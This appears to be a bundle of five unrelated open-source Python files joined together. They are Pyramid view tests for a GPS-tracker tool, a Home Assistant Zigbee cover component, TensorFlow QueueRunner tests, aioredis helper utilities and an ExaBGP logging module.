self.request.matchdict['taskid'] = 'mytaskid'
views = Views(self.request)
task_result = Mock(AsyncResult)
task_result.ready.return_value = True
task_result.failed.return_value = False
views.celery.AsyncResult = Mock(return_value=task_result)
task = PythonTask()
task.name = 'plot'
views.celery.tasks = {'plot': task}
listdir.side_effect = OSError('[Errno 2] No such file or directory: /tmp/results/mytaskid')
result = views.result()
eresult = {'result': task_result,
'files': {},
'task': task,
'result_html': None,
}
self.assertEqual(result, eresult)
def test_result_template(self):
self.request.matchdict['script'] = 'plot'
self.request.matchdict['taskid'] = 'mytaskid'
views = Views(self.request)
task_result = Mock(AsyncResult)
views.task_result = Mock(return_value=task_result)
task = PythonTask()
task.render_result = Mock(return_value='mytemplate')
views.task = Mock(return_value=task)
files = {'result.csv': '/plot/mytaskid/result.csv', }
views.result_files = Mock(return_value=files)
result = views.result()
eresult = {'result': task_result,
'files': files,
'task': task,
'result_html': 'mytemplate',
}
self.assertEqual(result, eresult)
@patch('script_wrapper.views.FileResponse')
def test_result_file(self, fileresponse):
self.request.matchdict['script'] = 'plot'
self.request.matchdict['taskid'] = 'mytaskid'
self.request.matchdict['filename'] = 'stdout.txt'
views = Views(self.request)
task_result = Mock(AsyncResult)
task_result.id = 'mytaskid'
task_result.ready.return_value = True
views.celery.AsyncResult = Mock(return_value=task_result)
views.result_file()
epath = '/tmp/results/mytaskid/stdout.txt'
fileresponse.assert_called_with(epath, self.request)
@patch('script_wrapper.views.make_session_from_request')
def test_species(self, sm):
session = Mock()
mock_species = ['Lesser Black-backed Gull']
config = {'return_value.query.return_value.distinct.return_value.order_by.return_value': mock_species}
session.configure_mock(**config)
sm.return_value = session
views = Views(self.request)
species = views.species()
self.assertEqual(species, [{'id': 'Lesser Black-backed Gull',
'text': 'Lesser Black-backed Gull',
}])
@patch('script_wrapper.views.make_session_from_request')
def test_projects(self, sm):
session = Mock()
mock_projects = [('Project1')]
config = {'return_value.query.return_value.distinct.return_value.order_by.return_value': mock_projects}
session.configure_mock(**config)
sm.return_value = session
views = Views(self.request)
projects = views.projects()
self.assertEqual(projects, [{'id': 'Project1',
'text': 'Project1',
}])
@patch('script_wrapper.views.make_session_from_request')
def test_trackers(self, sm):
session = Mock()
mock_trackers = [(1, 'Project1', 'Lesser Black-backed Gull')]
config = {'return_value.query.return_value.join.return_value.join.return_value.order_by.return_value.distinct.return_value': mock_trackers}
session.configure_mock(**config)
sm.return_value = session
views = Views(self.request)
trackers = views.trackers()
self.assertEqual(trackers, [{'id': 1,
'project': 'Project1',
'species': 'Lesser Black-backed Gull',
}])
def test_revoke_task(self):
self.request.matchdict['taskid'] = 'mytaskid'
views = Views(self.request)
task_result = Mock(AsyncResult)
task_result.failed.return_value = False
views.celery = Mock()
views.celery.AsyncResult = Mock(return_value=task_result)
result = views.revoke_task()
self.assertEquals(result, {'success': True})
views.celery.AsyncResult.assert_called_with('mytaskid')
task_result.revoke.assert_called_with(terminate=True)
def test_tools(self):
self.config.add_route('apply', '/tool/{script}/')
views = Views(self.request)
taskMadeByResearcher = TaskMadeByResearcher()
taskMadeByDeveloper = TaskMadeByDeveloper()
views.celery.tasks = {
'plot': taskMadeByResearcher,
'kml': taskMadeByDeveloper,
'celery.chain': 'celery.chain object',
}
result = views.tools()
expected = [{
'label': 'Tracker Calendar',
'form_url': '/tool/calendar/',
'title': 'Calendar overview with daily statistics of GPS-tracker',
'description': '''More information can be found <a target="_blank" href="https://public.e-ecology.sara.nl/wiki/index.php/Tracker_Calendar">here</a>.''',
'made_by_researcher': False
}, {
'label': 'KMZ and Plot',
'form_url': '/tool/gpsvis_db/',
'title': 'Generate KMZ file and statistics plot',
'description': '',
'made_by_researcher': True
}]
self.assertEquals(result, expected)
|
|
"""Support for ZHA covers."""
from __future__ import annotations
import asyncio
import functools
import logging
from zigpy.zcl.foundation import Status
from homeassistant.components.cover import (
ATTR_CURRENT_POSITION,
ATTR_POSITION,
CoverDeviceClass,
CoverEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
STATE_CLOSED,
STATE_CLOSING,
STATE_OPEN,
STATE_OPENING,
Platform,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from .core import discovery
from .core.const import (
CHANNEL_COVER,
CHANNEL_LEVEL,
CHANNEL_ON_OFF,
CHANNEL_SHADE,
DATA_ZHA,
SIGNAL_ADD_ENTITIES,
SIGNAL_ATTR_UPDATED,
SIGNAL_SET_LEVEL,
)
from .core.registries import ZHA_ENTITIES
from .core.typing import ChannelType, ZhaDeviceType
from .entity import ZhaEntity
_LOGGER = logging.getLogger(__name__)
MULTI_MATCH = functools.partial(ZHA_ENTITIES.multipass_match, Platform.COVER)
async def async_setup_entry(
hass: HomeAssistant,
config_entry: ConfigEntry,
async_add_entities: AddEntitiesCallback,
) -> None:
"""Set up the Zigbee Home Automation cover from config entry."""
entities_to_create = hass.data[DATA_ZHA][Platform.COVER]
unsub = async_dispatcher_connect(
hass,
SIGNAL_ADD_ENTITIES,
functools.partial(
discovery.async_add_entities, async_add_entities, entities_to_create
),
)
config_entry.async_on_unload(unsub)
@MULTI_MATCH(channel_names=CHANNEL_COVER)
class ZhaCover(ZhaEntity, CoverEntity):
"""Representation of a ZHA cover."""
def __init__(self, unique_id, zha_device, channels, **kwargs):
"""Init this sensor."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._cover_channel = self.cluster_channels.get(CHANNEL_COVER)
self._current_position = None
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._cover_channel, SIGNAL_ATTR_UPDATED, self.async_set_position
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._state = last_state.state
if "current_position" in last_state.attributes:
self._current_position = last_state.attributes["current_position"]
@property
def is_closed(self):
"""Return if the cover is closed."""
if self.current_cover_position is None:
return None
return self.current_cover_position == 0
@property
def is_opening(self):
"""Return if the cover is opening or not."""
return self._state == STATE_OPENING
@property
def is_closing(self):
"""Return if the cover is closing or not."""
return self._state == STATE_CLOSING
@property
def current_cover_position(self):
"""Return the current position of ZHA cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._current_position
@callback
def async_set_position(self, attr_id, attr_name, value):
"""Handle position update from channel."""
_LOGGER.debug("setting position: %s", value)
self._current_position = 100 - value
if self._current_position == 0:
self._state = STATE_CLOSED
elif self._current_position == 100:
self._state = STATE_OPEN
self.async_write_ha_state()
@callback
def async_update_state(self, state):
"""Handle state update from channel."""
_LOGGER.debug("state=%s", state)
self._state = state
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._cover_channel.up_open()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_OPENING)
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._cover_channel.down_close()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(STATE_CLOSING)
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._cover_channel.go_to_lift_percentage(100 - new_pos)
if isinstance(res, list) and res[1] is Status.SUCCESS:
self.async_update_state(
STATE_CLOSING if new_pos < self._current_position else STATE_OPENING
)
async def async_stop_cover(self, **kwargs):
"""Stop the window cover."""
res = await self._cover_channel.stop()
if isinstance(res, list) and res[1] is Status.SUCCESS:
self._state = STATE_OPEN if self._current_position > 0 else STATE_CLOSED
self.async_write_ha_state()
async def async_update(self):
"""Attempt to retrieve the open/close state of the cover."""
await super().async_update()
await self.async_get_state()
async def async_get_state(self, from_cache=True):
"""Fetch the current state."""
_LOGGER.debug("polling current state")
if self._cover_channel:
pos = await self._cover_channel.get_attribute_value(
"current_position_lift_percentage", from_cache=from_cache
)
_LOGGER.debug("read pos=%s", pos)
if pos is not None:
self._current_position = 100 - pos
self._state = (
STATE_OPEN if self.current_cover_position > 0 else STATE_CLOSED
)
else:
self._current_position = None
self._state = None
@MULTI_MATCH(channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF, CHANNEL_SHADE})
class Shade(ZhaEntity, CoverEntity):
"""ZHA Shade."""
_attr_device_class = CoverDeviceClass.SHADE
def __init__(
self,
unique_id: str,
zha_device: ZhaDeviceType,
channels: list[ChannelType],
**kwargs,
) -> None:
"""Initialize the ZHA light."""
super().__init__(unique_id, zha_device, channels, **kwargs)
self._on_off_channel = self.cluster_channels[CHANNEL_ON_OFF]
self._level_channel = self.cluster_channels[CHANNEL_LEVEL]
self._position = None
self._is_open = None
@property
def current_cover_position(self):
"""Return current position of cover.
None is unknown, 0 is closed, 100 is fully open.
"""
return self._position
@property
def is_closed(self) -> bool | None:
"""Return True if shade is closed."""
if self._is_open is None:
return None
return not self._is_open
async def async_added_to_hass(self):
"""Run when about to be added to hass."""
await super().async_added_to_hass()
self.async_accept_signal(
self._on_off_channel, SIGNAL_ATTR_UPDATED, self.async_set_open_closed
)
self.async_accept_signal(
self._level_channel, SIGNAL_SET_LEVEL, self.async_set_level
)
@callback
def async_restore_last_state(self, last_state):
"""Restore previous state."""
self._is_open = last_state.state == STATE_OPEN
if ATTR_CURRENT_POSITION in last_state.attributes:
self._position = last_state.attributes[ATTR_CURRENT_POSITION]
@callback
def async_set_open_closed(self, attr_id: int, attr_name: str, value: bool) -> None:
"""Set open/closed state."""
self._is_open = bool(value)
self.async_write_ha_state()
@callback
def async_set_level(self, value: int) -> None:
"""Set the reported position."""
value = max(0, min(255, value))
self._position = int(value * 100 / 255)
self.async_write_ha_state()
async def async_open_cover(self, **kwargs):
"""Open the window cover."""
res = await self._on_off_channel.on()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = True
self.async_write_ha_state()
async def async_close_cover(self, **kwargs):
"""Close the window cover."""
res = await self._on_off_channel.off()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't open cover: %s", res)
return
self._is_open = False
self.async_write_ha_state()
async def async_set_cover_position(self, **kwargs):
"""Move the roller shutter to a specific position."""
new_pos = kwargs[ATTR_POSITION]
res = await self._level_channel.move_to_level_with_on_off(
new_pos * 255 / 100, 1
)
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't set cover's position: %s", res)
return
self._position = new_pos
self.async_write_ha_state()
async def async_stop_cover(self, **kwargs) -> None:
"""Stop the cover."""
res = await self._level_channel.stop()
if not isinstance(res, list) or res[1] != Status.SUCCESS:
self.debug("couldn't stop cover: %s", res)
return
@MULTI_MATCH(
channel_names={CHANNEL_LEVEL, CHANNEL_ON_OFF}, manufacturers="Keen Home Inc"
)
class KeenVent(Shade):
"""Keen vent cover."""
_attr_device_class = CoverDeviceClass.DAMPER
async def async_open_cover(self, **kwargs):
"""Open the cover."""
position = self._position or 100
tasks = [
self._level_channel.move_to_level_with_on_off(position * 255 / 100, 1),
self._on_off_channel.on(),
]
results = await asyncio.gather(*tasks, return_exceptions=True)
if any(isinstance(result, Exception) for result in results):
self.debug("couldn't open cover")
return
self._is_open = True
self._position = position
self.async_write_ha_state()
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for QueueRunner."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import tensorflow as tf
class QueueRunnerTest(tf.test.TestCase):
def testBasic(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = qr.create_threads(sess)
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testTwoOps(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var0 = tf.Variable(zero64)
count_up_to_3 = var0.count_up_to(3)
var1 = tf.Variable(zero64)
count_up_to_30 = var1.count_up_to(30)
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, [count_up_to_3, count_up_to_30])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
self.assertEqual(3, var0.eval())
self.assertEqual(30, var1.eval())
def testExceptionsCaptured(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["i fail", "so fail"])
threads = qr.create_threads(sess)
tf.global_variables_initializer().run()
for t in threads:
t.start()
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(2, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
self.assertTrue("Operation not in the graph" in str(exceptions[1]))
def testRealDequeueEnqueue(self):
with self.test_session() as sess:
q0 = tf.FIFOQueue(3, tf.float32)
enqueue0 = q0.enqueue((10.0,))
close0 = q0.close()
q1 = tf.FIFOQueue(30, tf.float32)
enqueue1 = q1.enqueue((q0.dequeue(),))
dequeue1 = q1.dequeue()
qr = tf.train.QueueRunner(q1, [enqueue1])
threads = qr.create_threads(sess)
for t in threads:
t.start()
# Enqueue 2 values, then close queue0.
enqueue0.run()
enqueue0.run()
close0.run()
# Wait for the queue runner to terminate.
for t in threads:
t.join()
# It should have terminated cleanly.
self.assertEqual(0, len(qr.exceptions_raised))
# The 2 values should be in queue1.
self.assertEqual(10.0, dequeue1.eval())
self.assertEqual(10.0, dequeue1.eval())
# And queue1 should now be closed.
with self.assertRaisesRegexp(tf.errors.OutOfRangeError, "is closed"):
dequeue1.eval()
def testRespectCoordShouldStop(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to])
# As the coordinator to stop. The queue runner should
# finish immediately.
coord = tf.train.Coordinator()
coord.request_stop()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
coord.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 0.
self.assertEqual(0, var.eval())
def testRequestStopOnException(self):
with self.test_session() as sess:
queue = tf.FIFOQueue(10, tf.float32)
qr = tf.train.QueueRunner(queue, ["not an op"])
coord = tf.train.Coordinator()
threads = qr.create_threads(sess, coord)
for t in threads:
t.start()
# The exception should be re-raised when joining.
with self.assertRaisesRegexp(ValueError, "Operation not in the graph"):
coord.join()
def testGracePeriod(self):
with self.test_session() as sess:
# The enqueue will quickly block.
queue = tf.FIFOQueue(2, tf.float32)
enqueue = queue.enqueue((10.0,))
dequeue = queue.dequeue()
qr = tf.train.QueueRunner(queue, [enqueue])
coord = tf.train.Coordinator()
qr.create_threads(sess, coord, start=True)
# Dequeue one element and then request stop.
dequeue.op.run()
time.sleep(0.02)
coord.request_stop()
# We should be able to join because the RequestStop() will cause
# the queue to be closed and the enqueue to terminate.
coord.join(stop_grace_period_secs=0.05)
def testMultipleSessions(self):
with self.test_session() as sess:
with tf.Session() as other_sess:
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
# NOTE that this test does not actually start the threads.
threads = qr.create_threads(sess, coord=coord)
other_threads = qr.create_threads(other_sess, coord=coord)
self.assertEqual(len(threads), len(other_threads))
def testIgnoreMultiStarts(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
coord = tf.train.Coordinator()
qr = tf.train.QueueRunner(queue, [count_up_to])
threads = []
# NOTE that this test does not actually start the threads.
threads.extend(qr.create_threads(sess, coord=coord))
new_threads = qr.create_threads(sess, coord=coord)
self.assertEqual([], new_threads)
def testThreads(self):
with self.test_session() as sess:
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
tf.global_variables_initializer().run()
qr = tf.train.QueueRunner(queue, [count_up_to, "bad op"])
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
threads = qr.create_threads(sess, start=True)
for t in threads:
t.join()
exceptions = qr.exceptions_raised
self.assertEqual(1, len(exceptions))
self.assertTrue("Operation not in the graph" in str(exceptions[0]))
def testName(self):
with tf.name_scope("scope"):
queue = tf.FIFOQueue(10, tf.float32, name="queue")
qr = tf.train.QueueRunner(queue, [tf.no_op()])
self.assertEqual("scope/queue", qr.name)
tf.train.add_queue_runner(qr)
self.assertEqual(1, len(tf.get_collection(tf.GraphKeys.QUEUE_RUNNERS,
"scope")))
def testStartQueueRunners(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session() as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testStartQueueRunnersNonDefaultGraph(self):
# CountUpTo will raise OUT_OF_RANGE when it reaches the count.
graph = tf.Graph()
with graph.as_default():
zero64 = tf.constant(0, dtype=tf.int64)
var = tf.Variable(zero64)
count_up_to = var.count_up_to(3)
queue = tf.FIFOQueue(10, tf.float32)
init_op = tf.global_variables_initializer()
qr = tf.train.QueueRunner(queue, [count_up_to])
tf.train.add_queue_runner(qr)
with self.test_session(graph=graph) as sess:
init_op.run()
threads = tf.train.start_queue_runners(sess)
for t in threads:
t.join()
self.assertEqual(0, len(qr.exceptions_raised))
# The variable should be 3.
self.assertEqual(3, var.eval())
def testQueueRunnerSerializationRoundTrip(self):
graph = tf.Graph()
with graph.as_default():
queue = tf.FIFOQueue(10, tf.float32, name="queue")
enqueue_op = tf.no_op(name="enqueue")
close_op = tf.no_op(name="close")
cancel_op = tf.no_op(name="cancel")
qr0 = tf.train.QueueRunner(
queue, [enqueue_op], close_op, cancel_op,
queue_closed_exception_types=(
tf.errors.OutOfRangeError, tf.errors.CancelledError))
qr0_proto = tf.train.QueueRunner.to_proto(qr0)
qr0_recon = tf.train.QueueRunner.from_proto(qr0_proto)
self.assertEqual("queue", qr0_recon.queue.name)
self.assertEqual(1, len(qr0_recon.enqueue_ops))
self.assertEqual(enqueue_op, qr0_recon.enqueue_ops[0])
self.assertEqual(close_op, qr0_recon.close_op)
self.assertEqual(cancel_op, qr0_recon.cancel_op)
self.assertEqual(
(tf.errors.OutOfRangeError, tf.errors.CancelledError),
qr0_recon.queue_closed_exception_types)
# Assert we reconstruct an OutOfRangeError for QueueRunners
# created before QueueRunnerDef had a queue_closed_exception_types field.
del qr0_proto.queue_closed_exception_types[:]
qr0_legacy_recon = tf.train.QueueRunner.from_proto(qr0_proto)
self.assertEqual("queue", qr0_legacy_recon.queue.name)
self.assertEqual(1, len(qr0_legacy_recon.enqueue_ops))
self.assertEqual(enqueue_op, qr0_legacy_recon.enqueue_ops[0])
self.assertEqual(close_op, qr0_legacy_recon.close_op)
self.assertEqual(cancel_op, qr0_legacy_recon.cancel_op)
self.assertEqual(
(tf.errors.OutOfRangeError,),
qr0_legacy_recon.queue_closed_exception_types)
if __name__ == "__main__":
tf.test.main()
|
|
from urllib.parse import urlparse, parse_qsl
from .log import logger
_NOTSET = object()
# NOTE: never put here anything else;
# just this basic types
_converters = {
bytes: lambda val: val,
bytearray: lambda val: val,
str: lambda val: val.encode(),
int: lambda val: b'%d' % val,
float: lambda val: b'%r' % val,
}
def encode_command(*args):
"""Encodes arguments into redis bulk-strings array.
Raises TypeError if any of args not of bytearray, bytes, float, int, or str
type.
"""
buf = bytearray(b'*%d\r\n' % len(args))
try:
for arg in args:
barg = _converters[type(arg)](arg)
buf.extend(b'$%d\r\n%s\r\n' % (len(barg), barg))
except KeyError as exc:
raise TypeError("Argument {!r} expected to be of bytearray, bytes,"
" float, int, or str type".format(arg))
return buf
def decode(obj, encoding):
if isinstance(obj, bytes):
return obj.decode(encoding)
elif isinstance(obj, list):
return [decode(o, encoding) for o in obj]
return obj
async def wait_ok(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
return res in (b'OK', 'OK')
async def wait_convert(fut, type_, **kwargs):
result = await fut
if result in (b'QUEUED', 'QUEUED'):
return result
return type_(result, **kwargs)
async def wait_make_dict(fut):
res = await fut
if res in (b'QUEUED', 'QUEUED'):
return res
it = iter(res)
return dict(zip(it, it))
class coerced_keys_dict(dict):
def __getitem__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__getitem__(self, other)
def __contains__(self, other):
if not isinstance(other, bytes):
other = _converters[type(other)](other)
return dict.__contains__(self, other)
class _ScanIter:
__slots__ = ('_scan', '_cur', '_ret')
def __init__(self, scan):
self._scan = scan
self._cur = b'0'
self._ret = []
def __aiter__(self):
return self
async def __anext__(self):
while not self._ret and self._cur:
self._cur, self._ret = await self._scan(self._cur)
if not self._cur and not self._ret:
raise StopAsyncIteration # noqa
else:
ret = self._ret.pop(0)
return ret
def _set_result(fut, result, *info):
if fut.done():
logger.debug("Waiter future is already done %r %r", fut, info)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, result, info)
else:
fut.set_result(result)
def _set_exception(fut, exception):
if fut.done():
logger.debug("Waiter future is already done %r", fut)
assert fut.cancelled(), (
"waiting future is in wrong state", fut, exception)
else:
fut.set_exception(exception)
def parse_url(url):
"""Parse Redis connection URI.
Parse according to IANA specs:
* https://www.iana.org/assignments/uri-schemes/prov/redis
* https://www.iana.org/assignments/uri-schemes/prov/rediss
Also more rules applied:
* empty scheme is treated as unix socket path no further parsing is done.
* 'unix://' scheme is treated as unix socket path and parsed.
* Multiple query parameter values and blank values are considered error.
* DB number specified as path and as query parameter is considered error.
* Password specified in userinfo and as query parameter is
considered error.
"""
r = urlparse(url)
assert r.scheme in ('', 'redis', 'rediss', 'unix'), (
"Unsupported URI scheme", r.scheme)
if r.scheme == '':
return url, {}
query = {}
for p, v in parse_qsl(r.query, keep_blank_values=True):
assert p not in query, ("Multiple parameters are not allowed", p, v)
assert v, ("Empty parameters are not allowed", p, v)
query[p] = v
if r.scheme == 'unix':
assert r.path, ("Empty path is not allowed", url)
assert not r.netloc, (
"Netlocation is not allowed for unix scheme", r.netloc)
return r.path, _parse_uri_options(query, '', r.password)
address = (r.hostname or 'localhost', int(r.port or 6379))
path = r.path
if path.startswith('/'):
path = r.path[1:]
options = _parse_uri_options(query, path, r.password)
if r.scheme == 'rediss':
options['ssl'] = True
return address, options
def _parse_uri_options(params, path, password):
def parse_db_num(val):
if not val:
return
assert val.isdecimal(), ("Invalid decimal integer", val)
assert val == '0' or not val.startswith('0'), (
"Expected integer without leading zeroes", val)
return int(val)
options = {}
db1 = parse_db_num(path)
db2 = parse_db_num(params.get('db'))
assert db1 is None or db2 is None, (
"Single DB value expected, got path and query", db1, db2)
if db1 is not None:
options['db'] = db1
elif db2 is not None:
options['db'] = db2
password2 = params.get('password')
assert not password or not password2, (
"Single password value is expected, got in net location and query")
if password:
options['password'] = password
elif password2:
options['password'] = password2
if 'encoding' in params:
options['encoding'] = params['encoding']
if 'ssl' in params:
assert params['ssl'] in ('true', 'false'), (
"Expected 'ssl' param to be 'true' or 'false' only",
params['ssl'])
options['ssl'] = params['ssl'] == 'true'
if 'timeout' in params:
options['timeout'] = float(params['timeout'])
return options
def encode_str(obj):
obj_type = type(obj)
if obj_type in _converters:
return _converters[obj_type](obj)
return obj
class cached_property:
def __init__(self, func):
self.func = func
def __get__(self, instance, cls=None):
name = self.func.__name__
result = instance.__dict__[name] = self.func(instance)
return result
|
|
# encoding: utf-8
"""
utils.py
Created by Thomas Mangin on 2009-09-06.
Copyright (c) 2009-2015 Exa Networks. All rights reserved.
"""
import os
import sys
import stat
import time
import syslog
import logging
import logging.handlers
from exabgp.configuration.environment import environment
_short = {
'CRITICAL': 'CRIT',
'ERROR': 'ERR'
}
def short (name):
return _short.get(name.upper(),name.upper())
class LazyFormat (object):
def __init__ (self,prefix,format,message):
self.prefix = prefix
self.format = format
self.message = message
def __str__ (self):
if self.format:
return self.prefix + self.format(self.message)
return self.prefix + self.message
def split (self,c):
return str(self).split(c)
class _Logger (object):
_instance = None
_syslog = None
_history = []
_max_history = 20
_config = ''
_pid = os.getpid()
_cwd = os.getcwd()
# we use os.pid everytime as we may fork and the class is instance before it
def pdb (self,level):
if self._pdb and level in ['CRITICAL','critical']:
import pdb
pdb.set_trace()
def config (self,config=None):
if config is not None:
self._config = config
return self._config
def history (self):
return "\n".join(self._format(*_) for _ in self._history)
def _record (self,timestamp,level,source,message):
if len(self._history) > self._max_history:
self._history.pop(0)
self._history.append((timestamp,level,source,message))
def _format (self,timestamp,level,source,message):
if self.short: return message
now = time.strftime('%a, %d %b %Y %H:%M:%S',timestamp)
return "%s | %-8s | %-6d | %-13s | %s" % (now,level,self._pid,source,message)
def _prefixed (self,level,source,message):
ts = time.localtime()
self._record(ts,level,source,message)
return self._format(ts,level,source,message)
def __init__ (self):
command = environment.settings()
self.short = command.log.short
self.level = command.log.level
self._pdb = command.debug.pdb
self._reactor = command.log.enable and (command.log.all or command.log.reactor)
self._daemon = command.log.enable and (command.log.all or command.log.daemon)
self._processes = command.log.enable and (command.log.all or command.log.processes)
self._configuration = command.log.enable and (command.log.all or command.log.configuration)
self._network = command.log.enable and (command.log.all or command.log.network)
self._wire = command.log.enable and (command.log.all or command.log.packets)
self._message = command.log.enable and (command.log.all or command.log.message)
self._rib = command.log.enable and (command.log.all or command.log.rib)
self._timer = command.log.enable and (command.log.all or command.log.timers)
self._routes = command.log.enable and (command.log.all or command.log.routes)
self._parser = command.log.enable and (command.log.all or command.log.parser)
if not command.log.enable:
return
self.destination = command.log.destination
self.restart(True)
def _can_write (self,location):
try:
s = os.stat(os.path.dirname(location))
except OSError:
return None
mode = s[stat.ST_MODE]
uid = os.geteuid()
gid = os.getegid()
return not not (
((s[stat.ST_UID] == uid) and (mode & stat.S_IWUSR)) or
((s[stat.ST_GID] == gid) and (mode & stat.S_IWGRP)) or
(mode & stat.S_IWOTH)
)
def restart (self,first=False):
if first:
destination = 'stderr'
else:
if self._syslog:
for handler in self._syslog.handlers:
self._syslog.removeHandler(handler)
destination = self.destination
try:
if destination in ('','syslog'):
if sys.platform == "darwin":
address = '/var/run/syslog'
else:
address = '/dev/log'
if not os.path.exists(address):
address = ('localhost', 514)
handler = logging.handlers.SysLogHandler(address)
self._syslog = logging.getLogger()
self._syslog.setLevel(logging.DEBUG)
self._syslog.addHandler(handler)
return True
if destination.lower().startswith('host:'):
# If the address is invalid, each syslog call will print an error.
# See how it can be avoided, as the socket error is encapsulated and not returned
address = (destination[5:].strip(), 514)
handler = logging.handlers.SysLogHandler(address)
self._syslog = logging.getLogger()
self._syslog.setLevel(logging.DEBUG)
self._syslog.addHandler(handler)
return True
if destination.lower() == 'stdout':
handler = logging.StreamHandler(sys.stdout)
self._syslog = logging.getLogger()
self._syslog.setLevel(logging.DEBUG)
self._syslog.addHandler(handler)
return True
if destination.lower() == 'stderr':
handler = logging.StreamHandler(sys.stderr)
self._syslog = logging.getLogger()
self._syslog.setLevel(logging.DEBUG)
self._syslog.addHandler(handler)
return True
# folder
logfile = os.path.realpath(os.path.normpath(os.path.join(self._cwd,destination)))
can = self._can_write(logfile)
if can is True:
handler = logging.handlers.RotatingFileHandler(logfile, maxBytes=5*1024*1024, backupCount=5)
elif can is None:
self.critical('ExaBGP can not access (perhaps as it does not exist) the log folder provided','logger')
return False
else:
self.critical('ExaBGP does not have the right to write in the requested log directory','logger')
return False
self._syslog = logging.getLogger()
self._syslog.setLevel(logging.DEBUG)
self._syslog.addHandler(handler)
return True
except IOError:
self.critical('Can not set logging (are stdout/stderr closed?)','logger')
return False
def debug (self,message,source='',level='DEBUG'):
for line in message.split('\n'):
if self._syslog:
self._syslog.debug(self._prefixed(level,source,line))
else:
print self._prefixed(level,source,line)
sys.stdout.flush()
def info (self,message,source='',level='INFO'):
for line in message.split('\n'):
if self._syslog:
self._syslog.info(self._prefixed(level,source,line))
else:
print self._prefixed(level,source,line)
sys.stdout.flush()
def warning (self,message,source='',level='WARNING'):
for line in message.split('\n'):
if self._syslog:
self._syslog.warning(self._prefixed(level,source,line))
else:
print self._prefixed(level,source,line)
sys.stdout.flush()
